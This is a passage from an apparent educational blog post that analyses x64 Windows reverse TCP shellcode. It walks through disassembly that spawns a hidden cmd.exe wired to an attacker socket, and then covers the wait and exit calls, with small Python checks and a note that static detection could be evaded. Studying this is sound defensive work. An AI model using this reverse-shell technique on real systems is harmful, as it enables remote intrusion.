 182:   41 50                   push   r8
 184:   49 ff c8                dec    r8
 187:   4d 89 c1                mov    r9,r8
 18a:   4c 89 c1                mov    rcx,r8
 18d:   41 ba 79 cc 3f 86       mov    r10d,0x863fcc79 <- CreateProcessA()
 193:   ff d5                   call   rbp

This is gonna be a long and in-depth section, so I’ll hop right into it. First thing we do is shrink our stack. This will give us a clean slate to work with, while also keeping any necessary structures still in place. Then we’ll move the string “cmd\0” into the r8 register, setting the remaining bytes in the register to 0x00. We then push the string in the r8 register to the stack twice. Once for somewhere to reference via a pointer, and another time to add padding. We then move the string’s address to the rdx register. We will use the “cmd” string to tell CreateProcessA that we want to open a cmd.exe shell.

Next, we’re going to work on creating our STARTUPINFO and PROCESS_INFORMATION structures on the stack. We start by taking our socket handle stored in the rdi register, and pushing it to the stack three times. These will act as our STDIN, STDOUT, and STDERR handles in the STARTUPINFO structure. This means we’ll be receiving all input from and sending all output and errors to our attacker machine via our reverse TCP connection.

Now, we’re going to provision the rest of our STARTUPINFO and PROCESS_INFORMATION structure’s memory on the stack. We do this by zeroing out the r8 register. Next we set the rcx register to 0xd (13 in decimal). We’ll then push the r8 register to the stack 13 times with the loop instruction. What this does is push 13 QWORDs (104 bytes) worth of null-bytes to the stack.

With the three handles we’ve already pushed to the stack, as well as 104 null-bytes we’ve provisioned on the stack, this represents the STARTUPINFO and PROCESS_INFORMATION structures. To get a better understanding of what this looks like in memory, please refer to Diagram 6 below:

Diagram 6: How PROCESS_INFORMATION and STARTUPINFO structures are laid out in the stack.

Before we proceed with aligning our arguments for CreateProcessA on the stack and appropriate registers, we must set a couple of the member values in our STARTUPINFO structure. First, we set the STARTUPINFO.dwFlags member to 0x101. This sets the STARTF_USESTDHANDLES (0x100) flag, which tells CreateProcessA to use the hStdInput/Output/Error fields, and the STARTF_USESHOWWINDOW (0x001) flag, which tells it to honor the wShowWindow member. Since wShowWindow is still zero (SW_HIDE), the cmd.exe window spawns invisibly (no console popup). We then load the address for our STARTUPINFO structure (rsp+0x18) into the rax register, and set the STARTUPINFO.cb member’s value to 0x68 (104 in decimal). STARTUPINFO.cb is the first member in our STARTUPINFO structure, and is responsible for holding the byte length of the structure.

We then load the PROCESS_INFORMATION structure’s address (located at rsp+0x00) into the rsi register. This structure will be responsible for holding the process and thread handles for our newly spawned cmd.exe process, as well as its process and thread IDs.
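The offsets used above (rsp+0x18, rsp+0x54, and the 0x68 structure size) can be cross-checked by laying out the two structures by hand. The sketch below assumes the 64-bit field sizes listed in the tables and a simple natural-alignment rule; the `layout` helper is made up for this example.

```python
STARTUPINFOA_FIELDS = [
    ("cb", 4), ("lpReserved", 8), ("lpDesktop", 8), ("lpTitle", 8),
    ("dwX", 4), ("dwY", 4), ("dwXSize", 4), ("dwYSize", 4),
    ("dwXCountChars", 4), ("dwYCountChars", 4), ("dwFillAttribute", 4),
    ("dwFlags", 4), ("wShowWindow", 2), ("cbReserved2", 2),
    ("lpReserved2", 8), ("hStdInput", 8), ("hStdOutput", 8), ("hStdError", 8),
]
PROCESS_INFORMATION_FIELDS = [
    ("hProcess", 8), ("hThread", 8), ("dwProcessId", 4), ("dwThreadId", 4),
]


def layout(fields: list) -> tuple:
    """Return ({field: offset}, total size) using natural alignment."""
    offsets, offset = {}, 0
    for name, size in fields:
        offset = -(-offset // size) * size  # round up to the field's own size
        offsets[name] = offset
        offset += size
    return offsets, -(-offset // 8) * 8     # pad the struct to a multiple of 8


pi_offsets, pi_size = layout(PROCESS_INFORMATION_FIELDS)
si_offsets, si_size = layout(STARTUPINFOA_FIELDS)
print(hex(pi_size), hex(si_size))               # 0x18 0x68
print(hex(pi_size + si_offsets["dwFlags"]))     # 0x54
print(hex(pi_size + si_offsets["hStdInput"]))   # 0x68
```

The last value also explains the 13 zeroed QWORDs: 13 * 8 = 0x68 bytes sit below the three pushed socket handles, so the handles land exactly on hStdInput, hStdOutput, and hStdError.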

Since the stack is last-in-first-out, we’ll need to push our CreateProcessA arguments to the stack in reverse. So we push our lpProcessInformation argument in the rsi register first, followed by our lpStartupInfo argument in the rax register. Since the r8 register is still zero, lpCurrentDirectory, lpEnvironment, and dwCreationFlags will be set to zero. We then increment the r8 register by 0x1 so that we can set bInheritHandles to true. We then decrease the r8 register back to zero, and move the value into the r9 and rcx registers. This will set lpApplicationName, lpProcessAttributes, lpThreadAttributes all to zero as well. CreateProcessA’s arguments should look something like this (note that the first 4 args are passed in rcx, rdx, r8, and r9; the stack slots listed for them are the shadow space reserved for those registers, and the offsets are relative to rsp on entry to CreateProcessA):

RSP+0x08 (rcx): lpApplicationName    = NULL                         (not used)
RSP+0x10 (rdx): lpCommandLine        = ptr to "cmd\0"               (spawn cmd.exe)
RSP+0x18 (r8):  lpProcessAttributes  = NULL
RSP+0x20 (r9):  lpThreadAttributes   = NULL
RSP+0x28:       bInheritHandles      = TRUE (0x1)                   (socket handle inherited)
RSP+0x30:       dwCreationFlags      = 0                            (default)
RSP+0x38:       lpEnvironment        = NULL                         (inherit parent environment)
RSP+0x40:       lpCurrentDirectory   = NULL                         (inherit cwd)
RSP+0x48:       lpStartupInfo        = ptr to STARTUPINFO           (holds socket & process creation flags)
RSP+0x50:       lpProcessInformation = ptr to PROCESS_INFORMATION   (receive hProcess & hThread handles)

We now load the hash for the CreateProcessA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a non-zero value and our cmd.exe process should be running with STDIN/STDOUT/STDERR pointing to our reverse TCP shell.

4.2: Call WaitForSingleObject()

 195:   48 31 d2                xor    rdx,rdx
 198:   48 ff ca                dec    rdx
 19b:   8b 0e                   mov    ecx,DWORD PTR [rsi]
 19d:   41 ba 08 87 1d 60       mov    r10d,0x601d8708 <- WaitForSingleObject()
 1a3:   ff d5                   call   rbp

After calling CreateProcessA, we need to tell our shellcode to wait for the cmd.exe process to finish, or else we’ll exit our process prematurely. This is what WaitForSingleObject does.

We start by zeroing out the rdx register, then decrementing it by 1. This sets rdx to -1 (all bits set), telling WaitForSingleObject to wait indefinitely for the cmd.exe process to finish. Then we dereference the rsi register, which points to our PROCESS_INFORMATION structure, to load its first member (the process handle, hProcess) into the ecx register (lower 32 bits of rcx).
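The wrap-around that turns zero into an infinite timeout can be shown with masked integer arithmetic. This is a sketch only: Python integers do not overflow, so the 64-bit register width is emulated with a mask.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

rdx = 0                   # xor rdx,rdx
rdx = (rdx - 1) & MASK64  # dec rdx wraps around to all ones
edx = rdx & 0xFFFFFFFF    # the timeout parameter is a 32-bit DWORD

INFINITE = 0xFFFFFFFF     # value of the INFINITE constant in the Windows headers
print(hex(rdx), edx == INFINITE)  # 0xffffffffffffffff True
```

Two short instructions replace a longer mov with a 32-bit or 64-bit immediate, which keeps the shellcode compact.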

We now load the hash for the WaitForSingleObject function into the r10d register (lower 32 bits of the r10 register) and call the function. The function’s return value depends on how the process terminates.

4.3: Call GetVersion() and exit process

 1a5:   bb f0 b5 a2 56          mov    ebx,0x56a2b5f0 <- one version of ExitProcess()
 1aa:   41 ba a6 95 bd 9d       mov    r10d,0x9dbd95a6 <- GetVersion()
 1b0:   ff d5                   call   rbp

 1b2:   48 83 c4 28             add    rsp,0x28
 1b6:   3c 06                   cmp    al,0x6
 1b8:   7c 0a                   jl     0x1c4
 1ba:   80 fb e0                cmp    bl,0xe0
 1bd:   75 05                   jne    0x1c4
 1bf:   bb 47 13 72 6f          mov    ebx,0x6f721347 <- RtlExitUserThread() in ntdll.dll (equivalent to ExitThread())
 1c4:   6a 00                   push   0x0
 1c6:   59                      pop    rcx
 1c7:   41 89 da                mov    r10d,ebx
 1ca:   ff d5                   call   rbp

We’re now in the final section of our shellcode. We start by loading the hash for ExitProcess function into the ebx register. We then load the hash for GetVersion and call the function. This will return a major and minor version number, along with some other information. But we only need the major version in the low-order byte of the rax register (the al register).

We then clean up 40 bytes (0x28) of stack space left behind by the preceding API calls.

We now compare the al register to 0x6. We do this to see which version of Windows we’re running on. If we’re running on Windows Vista or higher (major version 6 or above), we continue on. Otherwise, we jump down to 0x1c4, where we prepare to exit the shellcode.

Now this next bit of shellcode at 0x1ba confused me, and I can’t find a good answer for it. It compares the bl register (the low byte of the ExitProcess hash we loaded into ebx, which is 0xf0) against 0xe0, so in this payload the comparison is always false. That makes the instruction at 0x1bf dead code, since it can never be reached. If you can find a good reason for this, please email me! I’d love to know.

Anyways, we set the rcx register to 0x0 (the exit code), then move the hash for the ExitProcess function from ebx into the r10d register (lower 32 bits of the r10 register) and call the function. An exit code of zero tells Windows that the process terminated successfully.
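The branch logic from 0x1b6 to 0x1bf can be modeled in Python to confirm that the swap never happens with the hash used in this payload. The function name and the second test hash are made up; the two named constants are the values from the listing.

```python
EXIT_PROCESS_HASH = 0x56A2B5F0          # loaded into ebx at 0x1a5
RTL_EXIT_USER_THREAD_HASH = 0x6F721347  # loaded into ebx at 0x1bf


def select_exit_hash(get_version_result: int, ebx: int) -> int:
    """Return the hash that ends up in r10d at 0x1c7."""
    al = get_version_result & 0xFF  # major version (assumed below 0x80 here)
    bl = ebx & 0xFF                 # low byte of the exit function hash
    if al >= 6 and bl == 0xE0:      # cmp al,0x6 / jl, then cmp bl,0xe0 / jne
        return RTL_EXIT_USER_THREAD_HASH
    return ebx


print(hex(select_exit_hash(10, EXIT_PROCESS_HASH)))  # 0x56a2b5f0
print(hex(select_exit_hash(10, 0x123456E0)))         # 0x6f721347 (hypothetical hash ending in 0xe0)
```

In other words, the replacement at 0x1bf would only take effect if ebx had been loaded with a hash whose low byte is 0xe0.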

Conclusion

We’ve covered a lot of ground in this post. We were able to analyze how shellcode walks the PEB and ROR-13 hashes DLLs and their individual functions, then compares those hashes to a user-supplied value and returns the appropriate pointer address for a requested function. We then watched how we can create a reverse TCP connection socket to our attacker machine, and spawn a cmd.exe process that communicates over that socket handle. Once finished with the process, we observed how the shellcode gracefully exits.

Even though Microsoft Defender is able to statically detect this shellcode, with enough manipulating and rearranging, it could be possible to bypass static detection. Though, the techniques covered in this post (PEB Walking, API Hashing, dynamic function resolution) would most likely be picked up by modern endpoint detection solutions. Understanding how shellcode works is valuable for both offensive and defensive security teams. Hopefully this post gave you a solid foundation for recognizing these patterns when you encounter them in the wild.

Sources

I was able to learn more about the Windows System Internals topics within this post via the following blog posts:

Find DLL base addresses from PEB: https://rootfu.in/how-to-part-1-find-dllbase-address-from-peb-in-x64-assembly/

LDR_DATA_TABLE_ENTRY structure reference: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm

Linked Lists: https://bsodtutorials.blogspot.com/2013/10/linked-lists-flink-and-blink.html

PE Header structure: https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/

Location of the Export Directory Table in a PE: https://xen0vas.github.io/Win32-Reverse-Shell-Shellcode-part-2-Locate-the-Export-Directory-Table/#

This post is licensed under CC BY 4.0 by the author.